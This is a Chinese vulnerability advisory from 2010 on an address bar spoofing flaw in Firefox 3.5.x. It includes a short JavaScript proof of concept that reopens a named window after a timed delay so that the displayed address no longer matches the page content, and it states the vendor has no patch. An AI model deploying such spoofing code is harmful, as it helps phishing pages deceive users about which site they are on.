Mozilla Firefox 3.5.x Address Bar Spoofing Vulnerability

  • 发表于
  • Vulndb

发布时间:2010-07-21
影响版本:

Mozilla Firefox 3.5.x

漏洞描述:

Firefox是非常流行的开源WEB浏览器

由于浏览器在处理某些伪协议时存在安全问题,导致恶意站点可以实现地址栏欺骗,用户可能在毫无知觉的情况下被引导进去一个钓鱼或者欺骗页面,该页面的地址栏是完全正确的地址,内容却可以被随意构造。

<*参考

http://Securitylab.ir/Advisories

*>
测试方法:
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

<script language="javascript">
function pause(pd)
{
date = new Date();
var curDate = null;
do { var curDate = new Date(); }
while(curDate-date < pd);
}
function Spoofing () {
win = window.open('http://www.google.com','new')
pause (3000)
win = window.open('http://www.Securitylab.ir','new')
}
</script>
<a href="javascript: Spoofing()">Click Here</a>

安全建议:

厂商补丁:

Mozilla
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.mozilla.org/